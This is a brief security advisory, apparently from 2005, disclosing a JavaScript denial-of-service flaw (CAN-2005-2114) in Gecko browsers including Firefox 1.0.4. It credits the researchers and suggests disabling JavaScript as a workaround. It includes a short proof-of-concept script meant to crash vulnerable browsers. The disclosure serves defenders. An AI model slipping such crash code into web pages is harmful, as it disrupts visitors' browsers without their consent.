‘Gecko Browsers DoS’

Summary

A denial of service vulnerability in Gecko-based browsers (Netscape, K-Meleon, Mozilla Suite, Firefox and Camino) allows attackers to crash the browser with specially crafted JavaScript code.

Credit:

The information has been provided by Kurczaba Associates and Juha-Matti Laurio.
The original article can be found at: http://www.kurczaba.com/html/security/0506241.htm


Details

Vulnerable Systems:
 * Mozilla Suite version 1.7.8
 * Firefox version 1.0.4
 * Camino version 0.8.4
 * Netscape Browser versions 8.x
 * K-Meleon Browser versions 0.x

By using a specially crafted JavaScript function, it is possible to crash the above named browsers. The script can be executed both with and without user intervention.
Proof of Concept:
for (a = 0; a <= 20000; a++)
{
  // Here is the special code that terminates the browser
  function(){};
}
// Displays an alert to notify the user if the browser is not vulnerable.
alert('Good news – Your browser is not vulnerable.');

Workaround:
Disable JavaScript for untrusted web sites.

CVE Information:
CAN-2005-2114
